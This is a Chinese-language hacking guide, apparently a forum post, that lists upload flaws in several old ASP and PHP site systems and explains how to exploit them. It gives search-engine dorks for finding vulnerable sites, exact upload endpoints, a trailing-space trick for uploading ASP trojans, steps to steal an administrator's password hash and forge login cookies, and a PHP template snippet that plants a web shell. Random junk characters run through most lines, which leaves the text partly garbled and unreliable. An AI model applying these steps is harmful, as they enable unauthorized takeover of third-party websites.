一、E时代驿站漏洞
@~ L.m}GF 百度搜索"E时代驿站"
|O?Aj1g[c? 漏洞利用页面 /upload.asp 用老兵直接上传
&i!] op C11c/ 二、沸腾新闻系统上传漏洞
|M_Bbo@ud 搜索:沸腾展望新闻系统[核心:尘缘雅境]授权使用
48`<{|r{ 漏洞:没有对空格进行严格的限制。
1<"kN^ 所以,我们直接选定要上传的asp木马,然后在后面加上空格
$u
sU 它的上传文件是UploadFaceOK.asp
xWm'E2 H5{J2M,f 三、尘缘雅境
wSMgBRV#^ CHB{P\WF 在GOOGLE里搜索关键词: V1.0 ACCESS Finish,就会看
"/"k50% 到出现了 一大堆 使用尘缘雅境系统的网站.比如说他的网站首页是
http://www.xx.com/asfq/index.asp,那么就要这样填写
http://www.xx.com/asfq/admin/uploadfaceok.asp,[漏洞目录]:/asfq/admin(注意一定要加上admin),[漏洞文件]一般不用改,不过有些老版的尘缘系统的漏洞文是uploadok.asp,如果uploadfaceok.asp不成功再改
='j Z5=!R$4 四、OFSTAR论坛漏洞利用程序(群共享中)
V'$
eun 搜索: powered by ofstar.net
4J1Q])G9 1:输入管理员用户名
fZO/HzX 2:输入任意一个帖子的路径!
*79<ypKG$ 3:单击获取密码,可以截取到管理员的MD5密码!是32位加密的!
aRmS{X3 4:单击直接登陆按钮!程序会自动构造Cookies进行锹?单击管理栏的"超管"可直接进入后台!
.Yx.Lm} $;1~JOZh 上传木马: 选择后台的论坛管理=>风格摸版设置 插入以下代码! (其实上传shell部分和PHPWind一样)
u4'Lm+&O Jd;1dYkH: 然后使用提交页面提交``可以直接拿到shell!
);[`rXH_ 0&x)5^lG <style type='text/css'>
TxWjgW~ </style>
;`+,gVrp <!--
'Bx7b(xqk EOT;
{TNAK%'v ?>-->
"=;&{N~8U <?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
AUK7a <!--
Mi/_hzZ\ <?php
GZw<Y+/V"5 print <<<EOT
Nvi14,q/ -->
4C:YEX~ Yq_zlxd%F 五、破废墟BLOG漏洞
~gc)Ww0(Q 百度搜:"破废墟 Bloging" ,在后面加上upfile.asp,结果返回
{~"=6iyj DLOG错误:提交的数据来自网站外部 | 返 回
}!LYV 或者 您要访问的网页有问题,无法显示。
P,wJ@8lv HTTP 500 - 内部服务器错误
0)NHjKP 这说明这个文件是存在的,但是无法正常的访问,其实我们也可以利用
fomkwN 直接用老兵上传木马
http://www.xxxxx.com/blog/upfile.asp P
dJ*'@~i khfE<<